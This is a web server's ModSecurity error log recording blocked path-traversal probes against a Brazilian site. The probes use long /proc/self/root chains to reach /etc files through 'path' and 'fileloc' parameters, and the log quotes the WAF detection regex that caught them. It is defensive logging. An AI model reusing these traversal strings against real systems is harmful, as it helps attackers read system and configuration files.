[Tue Mar 17 10:34:41.380976 2026] [:error] [pid 18604:tid 140411548894976] [client 74.7.243.203:34968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYcUBd0UqwxWindINuQQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:34:46.711314 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.46:33888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYdqBJNF7axNlVR0UDXQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:34:51.580972 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.203:39460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYeweiSKl8TjouI-YIAwAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:35:02.089825 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.46:43720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYhqBJNF7axNlVR0UDawAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:35:21.308107 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.203:41488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYma4xEDsg_V3ESNY5oAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:35:24.851192 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.243.203:58130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYnJqmL8PQht4WJFlOHgAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:35:26.193999 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.243.203:58146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYntCmCSWTlPouqorSRgAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:35:36.550655 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.243.203:58148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYqKBJNF7axNlVR0UDeQAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:35:41.103033 2026] [:error] [pid 1731:tid 140411708356352] [client 74.7.243.203:55524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYrAb2qCuy5irgBMjO0gAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:36:09.977442 2026] [:error] [pid 18709:tid 140411666392832] [client 74.7.228.16:34524] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablYyTarLhPAjZGI1b20aQAAA4k"]
[Tue Mar 17 10:36:40.001266 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.241.46:33614] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY5zarLhPAjZGI1b20hQAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:36:51.575531 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:42328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY89CmCSWTlPouqorSkAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:36:53.070668 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:56966] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY9DarLhPAjZGI1b20hwAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:36:54.402526 2026] [:error] [pid 18604:tid 140411574073088] [client 74.7.243.203:56974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY9kBd0UqwxWindINuawAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:36:57.411219 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.243.203:56988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY-Kt8Nd0UC_OcbVG1vQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:36:58.704147 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:57000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY-u82sZHvlq4xgHrJvQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:00.059276 2026] [:error] [pid 1731:tid 140411641214720] [client 74.7.243.203:57016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY_Ab2qCuy5irgBMjO3wAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:01.440310 2026] [:error] [pid 1731:tid 140411548894976] [client 74.7.243.203:34348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablY_Qb2qCuy5irgBMjO4AAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:07.299374 2026] [:error] [pid 18709:tid 140411582465792] [client 74.7.243.203:34352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZAzarLhPAjZGI1b20jAAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:08.623065 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:34366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZBKBJNF7axNlVR0UDhQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:10.983457 2026] [:error] [pid 11293:tid 140411616036608] [client 74.7.243.203:34376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZBtCmCSWTlPouqorSlAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:12.356762 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.243.203:39774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZCO82sZHvlq4xgHrJwAAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
